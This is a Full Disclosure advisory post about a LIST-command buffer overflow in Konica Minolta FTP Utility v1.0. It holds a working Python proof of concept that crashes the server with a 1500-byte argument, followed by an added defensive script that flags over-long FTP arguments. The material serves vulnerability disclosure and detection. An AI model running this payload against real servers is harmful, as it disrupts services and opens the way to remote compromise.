[FD] Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC)
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC)
- From: <socket_0x03@xxxxxxxxxxx>
- Date: Wed, 20 May 2020 05:22:26 -0700
====================================================================================================
=============== [ Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) ] ===============
====================================================================================================

# Exploit Title: Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC)
# Date: [05-16-2020]
#
# Found by: Alvaro J. Gene (Socket_0x03)
# Email: Socket_0x03 (at) teraexe (dot) com
# Website: www (dot) teraexe (dot) com
#
# Software Link: https://konica-minolta-ftp-utility.software.informer.com/download/
# Vulnerable Application: Konica Minolta FTP Utility
# Version: 1.0
# Server: FTP Server
# Vulnerable Command: LIST
# Tested on: Windows 7 SP1
#
# Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server
# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers,
# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite
# some registers, an individual can use the vulnerable command to build a remote buffer
# overflow exploit that will root a system without any user interaction.

from ftplib import FTP

ftp = FTP('192.168.0.16')

buffer = "A" * 1500

ftp.login()

ftp.retrlines('LIST ' + buffer)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
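
Added example, not part of the original post or of the vendor's software: a defender-side check over a reassembled FTP control-channel stream that flags command arguments longer than a policy limit, as the 1500-byte LIST argument in the post would be. MAX_ARG_LEN, the function names and the sample stream are assumptions constructed for illustration.

```python
# Added example (not from the original post): defender-side check that flags
# over-long FTP command arguments in a reassembled client-to-server stream.
from collections import Counter

# Assumption: policy limit for this example, not a value from the advisory.
MAX_ARG_LEN = 512

def parse_command(line: bytes):
    """Split one control-channel line into (VERB, raw argument bytes)."""
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    return verb.upper().decode("ascii", "replace"), arg

def inspect_stream(data: bytes, max_arg_len: int = MAX_ARG_LEN):
    """Return one finding per command whose argument exceeds max_arg_len.

    The final chunk is inspected even without a CRLF terminator, so an
    oversized command is reported before the line is complete.
    """
    findings = []
    for number, line in enumerate(data.split(b"\n"), start=1):
        verb, arg = parse_command(line)
        if len(arg) <= max_arg_len:
            continue
        # Share of the argument taken by its most common byte: padding such
        # as a run of one character scores close to 1.0.
        _, count = Counter(arg).most_common(1)[0]
        findings.append({
            "line": number,
            "verb": verb,
            "arg_len": len(arg),
            "filler_ratio": round(count / len(arg), 2),
        })
    return findings

# Constructed sample: an anonymous session whose sixth command carries a
# 1500-byte argument, the size used in the post above.
SAMPLE = b"".join([
    b"USER anonymous\r\n", b"PASS anonymous@\r\n", b"TYPE A\r\n",
    b"PASV\r\n", b"LIST /scans\r\n",
    b"LIST " + b"A" * 1500 + b"\r\n", b"QUIT\r\n",
])

if __name__ == "__main__":
    for finding in inspect_stream(SAMPLE):
        print(finding)
```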